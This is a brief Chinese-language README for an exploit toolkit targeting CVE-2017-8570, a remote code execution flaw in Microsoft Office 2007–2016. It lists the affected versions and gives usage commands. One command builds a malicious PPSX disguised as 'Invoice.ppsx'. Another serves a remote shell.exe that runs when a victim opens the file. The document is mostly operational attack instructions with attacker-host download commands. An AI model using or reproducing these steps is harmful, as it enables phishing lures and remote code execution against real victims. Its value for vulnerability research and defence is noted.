CVE-2017-8570

CVE-2017-8570

说明

Script Moniker 远程代码执行漏洞

影响范围

• Microsoft Office 2007 Service Pack 3
• Microsoft Office 2010 Service Pack 2 (32-bit editions)
• Microsoft Office 2010 Service Pack 2 (64-bit editions)
• Microsoft Office 2013 RT Service Pack 1
• Microsoft Office 2013 Service Pack 1 (32-bit editions)
• Microsoft Office 2013 Service Pack 1 (64-bit editions)
• Microsoft Office 2016 (32-bit edition)
• Microsoft Office 2016 (64-bit edition)

用法

创建恶意文档

# python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.154.200/logo.doc
Generated Invoice.ppsx successfully

启动HTTP服务，监听指定端口

python cve-2017-8570_toolkit.py -M exp -e http://192.168.154.200/shell.exe -l /tmp/shell.exe

当受害者打开 Invoice.ppsx 即可执行 shell.exe，但是会有CMD窗口闪现

参考文章

• Office CVE-2017-8570远程代码执行漏洞复现
• Proof of Concept exploit for CVE-2017-8570